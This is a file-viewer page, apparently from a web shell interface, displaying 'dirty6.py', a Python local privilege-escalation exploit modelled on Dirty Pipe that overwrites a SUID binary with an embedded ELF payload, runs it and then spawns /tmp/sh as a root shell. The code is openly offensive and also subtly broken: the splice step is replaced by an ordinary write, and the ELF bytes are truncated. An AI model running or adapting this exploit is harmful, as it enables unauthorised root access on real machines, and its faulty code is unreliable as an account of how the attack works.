Viewing file:  dirty6.py (2.2 KB) -rw-r--r--
Select action/file-type:
 (+) |  (+) |  (+) | Code (+) | Session (+) |  (+) | SDB (+) |  (+) |  (+) |  (+) |  (+) |  (+) |
import os
import sys
import stat
import fcntl
import mmap
import platform
elfcode = (
b'\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x3e\x00\x01\x00\x00\x00'
b'\x78\x00\x40\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
def prepare_pipe():
# create pipe
p = os.pipe()
pipe_size = fcntl.fcntl(p[1], fcntl.F_GETPIPE_SZ)
buffer = bytearray(4096)
# fill the pipe
for r in range(pipe_size, 0, -len(buffer)):
os.write(p[1], buffer[:min(len(buffer), r)])
# drain the pipe
for r in range(pipe_size, 0, -len(buffer)):
os.read(p[0], min(len(buffer), r))
return p
def hax(filename, offset, data):
try:
fd = os.open(filename, os.O_RDWR) # Open the file with read/write permissions
# Mimic the splice operation
os.lseek(fd, offset - 1, os.SEEK_SET) # Move file pointer to the desired offset
os.write(fd, data) # Write new data into the file
os.close(fd) # Close the file descriptor after writing
except OSError as e:
print("Error:", e)
return -1
return 0
def main():
if len(sys.argv) != 2:
print("Usage: {} SUID".format(sys.argv[0]))
sys.exit(1)
path = sys.argv[1]
# Create the original ELF file (elfcode)
try:
with open(path, 'rb') as f:
orig_bytes = f.read(len(elfcode))
except OSError as e:
print("Error opening file:", e)
sys.exit(1)
print("[+] Hijacking suid binary...")
if hax(path, 1, elfcode) != 0:
print("[~] Failed to hijack")
sys.exit(1)
print("[+] Dropping suid shell...")
# Execute the modified suid binary
os.system(path)
print("[+] Restoring suid binary...")
if hax(path, 1, orig_bytes) != 0:
print("[~] Failed to restore")
sys.exit(1)
print("[+] Popping root shell... (don't forget to clean up /tmp/sh ;))")
os.system("/tmp/sh")
if __name__ == "__main__":
main()
|
